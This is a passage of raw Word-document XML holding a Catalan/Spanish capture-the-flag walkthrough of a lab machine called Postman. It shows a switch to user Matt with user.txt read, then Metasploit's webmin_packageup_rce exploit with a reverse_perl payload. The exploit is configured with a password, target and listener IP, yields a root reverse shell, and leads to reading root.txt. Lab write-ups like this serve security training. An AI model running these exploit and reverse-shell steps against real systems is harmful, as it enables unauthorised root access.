        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0256BBC1" wp14:editId="546D9CC0">
            <wp:extent cx="4819650" cy="15525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565D" w14:textId="77777777" w:rsidR="008C65E0" w:rsidRDefault="008C65E0" w:rsidP="008C65E0"/>
    <w:p w14:paraId="2BC61FA7" w14:textId="2A11808C" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="008C65E0">
      <w:r>
        <w:t>20 -&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fem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Matt i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mirem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la user.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB0E5A" w14:textId="77777777" w:rsidR="00ED7DA1" w:rsidRDefault="00ED7DA1" w:rsidP="00E90A39"/>
    <w:p w14:paraId="2B8513EF" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ su Matt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5A83A7" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79709D" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Matt@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE213CC" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Matt@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/$ cd home/Matt/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1E4E02" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Matt@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A34E7D" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:r>
        <w:t>6ae5a0ffbe058738a97524b0ecf6a80e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083EDBCC" w14:textId="4C06C7E2" w:rsidR="00ED7DA1" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Matt@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE45BC" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F"/>
    <w:p w14:paraId="4A1407C8" w14:textId="43F5BA92" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="0011411F">
      <w:r>
        <w:t xml:space="preserve">21- La idea per poder escalar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privilegis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C9624D">
        <w:t xml:space="preserve">será buscar un CVE que en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9624D">
        <w:t>funcio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9624D">
        <w:t xml:space="preserve"> de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9624D">
        <w:t>versio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9624D">
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9624D">
        <w:t>webadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9624D">
        <w:t xml:space="preserve"> 1.9, ja </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9624D">
        <w:t>podem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9624D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9624D">
        <w:t>veure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9624D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C9624D">
        <w:t>quin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C9624D">
        <w:t xml:space="preserve"> será : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1634FD" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="0011411F"/>
    <w:p w14:paraId="2A64CEC1" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C9A4D" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[*]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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13987429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 xml:space="preserve">) &gt; show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AAD09DB" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="3B6002E8" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">Module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/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>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C4AC8" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="08ADC5F5" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">      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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Required</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D8FFFAE" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   ----       ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850681C" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   PASSWORD                    yes       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webmin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6FB6F953" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proxies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                     no        A proxy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type:host:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type:host:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">][...].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proxies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sapni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, socks4, socks5, socks5h, http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5987C85B" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   RHOSTS                      yes       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target host(s), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>see</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491E37C8" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   RPORT      10000            yes       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274EBCA3" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   SSL        false            no        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Negotiate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SSL/TLS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outgoing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12A78FE9" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   TARGETURI  /                yes       Base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Webmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41489731" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   USERNAME                    yes       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18DCF976" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   VHOST                       no        HTTP server virtual host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705AE25B" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="69AAA9A1" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="533A66F8" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Payload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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D1E00" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="7AC49AAC" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Required</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="636EACEC" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ECD4FE" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   LHOST                   yes       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listen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an</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> interface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specified</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3E665" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   LPORT  4444             yes       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="679A8D87" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="2F344FE8" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="04EA4549" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A70B85E" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="415DC67D" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   Id  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4594892B" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F15B4" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">   0   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;= 1.910</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D0877C" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="6AEA8BDE" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="4304AC19" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="254B1D04" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">View </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> full module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-d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA4E570" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="4A02E25D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>) &gt; set PASSWORD computer2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB2DA1B" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t>PASSWORD =&gt; computer2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47663339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>) &gt; set RHOSTS 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7DD76" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t>RHOSTS =&gt; 10.129.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C87C3D9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>) &gt; set USERNAME Matt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F711659" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t>USERNAME =&gt; Matt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60734F36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>) &gt; set LHOST 10.10.14.91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B2C6A0" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t>LHOST =&gt; 10.10.14.91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7AB334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 xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0139ABE2" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Started</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse TCP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10.10.14.91:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C83B659" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[-]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aborted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unknown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F7457C" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[*]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</w:p>
    <w:p w14:paraId="40315A29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>) &gt; set SSL true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405CAA41" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[!]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SSL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>option's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RPORT!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC4931" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t>SSL =&gt; true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290C4E1" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webmin_packageup_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56DDAAAD" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Started</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse TCP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10.10.14.91:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E99EDE" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cookie: a1bed8cd850a2c3c165b2ef32568ad86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D807354" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Attempting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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D53EB2" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">[*]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1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opened</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (10.10.14.91:4444 -&gt; 10.129.2.1:54164) at 2026-05-21 11:03:04 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D32321" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="7CF79B8D" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F9C4DBF" w14:textId="42176603" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A53CCA8" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="667E0265" w14:textId="5EBDF598" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:r>
        <w:t xml:space="preserve">22-&gt; ROOT.FLAG . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BE3F27" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D"/>
    <w:p w14:paraId="29572D89" w14:textId="77777777" w:rsidR="00C9624D" w:rsidRDefault="00C9624D" w:rsidP="00C9624D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/root.txt</w:t>
      </w:r>
    </w:p>
